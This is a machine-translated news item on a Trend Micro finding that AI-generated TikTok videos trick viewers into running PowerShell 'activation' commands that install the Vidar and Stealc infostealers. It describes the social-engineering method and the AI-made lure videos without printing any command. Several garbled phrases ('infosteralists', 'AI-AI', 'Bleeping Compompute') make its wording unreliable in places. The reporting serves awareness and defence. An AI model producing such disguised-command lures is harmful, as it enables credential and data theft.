- Trend Micro has seen a new campaign of malicious software on Tiktok
- Videos show how to activate “Premium” features in different software
- The clips have been generated by AI and encourage victims to download infosteralists
Pirates publish videos generated by AI-AI on Tiktok to encourage users to download malware for infostorption, warned researchers in Trend Micro cybersecurity.
The premise is simple: attackers use AI to generate many videos demonstrating how to “easily activate” Windows and Microsoft Office, or activate “Premium functionalities” in applications such as Spotify or Capcut.
They then share these videos on Tiktok, whose algorithm makes it more likely to return viral video, which makes the success of the attack more likely.
A new turn on old tips
In the clip, a person is displayed to reveal the execution program on Windows, then run a PowerShell command.
In the video, the command involves the activation of special features, in reality, the users performing the command would download a malicious script which, in turn, deploys infosteralists Vidar and Stealc.
These information can take screenshots, steal connection identification information, enter credit card data, exfiltrate cookies, cryptocurrency portfolio information, 2FA codes, etc.
“This attack uses videos (possibly generated by AI) to ask users to run PowerShell commands, which are disguised as software activation stages. The algorithmic scope of Tiktok increases the probability of a generalized exposure, with a video reaching more than half a million views,” said Trend Micro.
“The videos are very similar, with only minor differences in camera angles and download URLs used by PowerShell to recover the payload,” added the researchers.
“These suggest that the videos have probably been created by automation. The educational voice also seems to be generated by AI, strengthening the probability that AI tools are used to produce these videos.”
One of the videos has around 500,000 views, more than 20,000 likes and more than 100 comments, which succeeds.
Videos were used to deliver malicious software in the past, but this new campaign is a major gap compared to previous methods.
The difference is that before, the link to malware has been shared in the description of the video or the commentary, where it could still be taken up by safety solutions. By delivering bait in a video format, the attackers successfully circumvent almost all security measures.
Via Bleeping Compompute
